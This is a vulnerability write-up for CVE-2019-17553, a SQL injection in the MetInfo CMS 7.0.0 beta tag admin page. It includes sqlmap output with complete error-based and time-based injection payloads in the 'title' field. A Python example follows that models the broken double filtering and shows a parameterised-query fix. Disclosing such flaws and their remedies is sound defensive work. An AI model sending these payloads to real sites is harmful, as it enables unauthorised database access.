Vulnerability Name: Metinfo CMS Background SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta
We can see the web application uses gpc to filter variables in the form. Code in app/system/entrance.php:71.

But the developers use the get_sql function for secondary filtering, causing the escaped single quotes to be unescaped. Code in app/system/tags/admin/index.class.php:171.

Payload

Attack with sqlmap
```
Multipart-like data found in POST data. Do you want to process it? [Y/n/q]
[18:25:17] [INFO] resuming back-end DBMS 'mysql'
[18:25:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART title ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 2052=2052 AND SLEEP(5)-- YLsI
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
---
[18:25:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.0
```
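The root cause the report describes is a layering bug: the request is escaped once by the GPC filter, then a second "sanitising" pass removes that escaping before the value is concatenated into SQL. The following is an added example, not MetInfo's code, that models the two passes in Python (the GPC pass with addslashes semantics, the second pass as an assumed stripslashes-like model of what the report says get_sql does) so the effect on the `title` literal can be checked, and then shows the fix: binding the value as a query parameter so no escaping layer is needed at all. The `tags` table and its columns are hypothetical, constructed in memory with sqlite3.

```python
import sqlite3

# Added example, not MetInfo's code. Models the two-stage filtering described in
# the report: a GPC-style escaping pass (addslashes semantics) followed by a
# second pass that removes the escaping again. The second pass is an ASSUMED
# model of what the report says get_sql does; table and column names are
# hypothetical.


def gpc_escape(value: str) -> str:
    """addslashes-style escaping: prefix ' " \\ with a backslash, NUL becomes \\0."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def second_filter(value: str) -> str:
    """stripslashes-style pass (assumed model of the get_sql re-filtering):
    drops each escaping backslash, so \\' becomes ' again."""
    out = []
    i = 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(value[i + 1])
            i += 2
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def has_unescaped_quote(literal: str) -> bool:
    """Check for a quote that would terminate a '...' literal: a single quote
    preceded by an even number (including zero) of backslashes."""
    backslashes = 0
    for ch in literal:
        if ch == "\\":
            backslashes += 1
            continue
        if ch == "'" and backslashes % 2 == 0:
            return True
        backslashes = 0
    return False


def build_update_unsafe(title: str, tag_id: int) -> str:
    """String-built UPDATE, the vulnerable pattern: escaped once, un-escaped
    again, then concatenated into the statement."""
    filtered = second_filter(gpc_escape(title))
    return f"UPDATE tags SET title='{filtered}' WHERE id={int(tag_id)}"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the CMS tag table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO tags VALUES (4, 'original')")
    return conn


def unsafe_update_fails(conn: sqlite3.Connection, title: str, tag_id: int) -> bool:
    """True if the string-built statement is no longer valid SQL, i.e. the
    user-controlled quote has escaped the literal."""
    try:
        conn.execute(build_update_unsafe(title, tag_id))
        return False
    except sqlite3.OperationalError:
        return True


def update_title_safe(conn: sqlite3.Connection, title: str, tag_id: int) -> str:
    """The fix: bind the value as a parameter; the quote is stored verbatim
    as data and no escaping layers are involved."""
    conn.execute("UPDATE tags SET title = ? WHERE id = ?", (title, int(tag_id)))
    conn.commit()
    row = conn.execute("SELECT title FROM tags WHERE id = ?", (int(tag_id),)).fetchone()
    return row[0]


if __name__ == "__main__":
    sample = "O'Reilly"  # constructed input containing a single quote
    print(gpc_escape(sample))                  # O\'Reilly  (still inside the literal)
    print(second_filter(gpc_escape(sample)))   # O'Reilly   (escaping undone)
    db = make_db()
    print(unsafe_update_fails(db, sample, 4))  # True
    print(update_title_safe(db, sample, 4))    # O'Reilly
```

`has_unescaped_quote` is the check worth keeping in a code review or a unit test for any remaining string-built queries: run it over the value exactly as it reaches the query builder, after every filter, not after the first one. The durable fix is the parameterised form; once values are bound rather than concatenated, the order and number of "filter" passes no longer matter for the SQL.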
CVE-2019-17553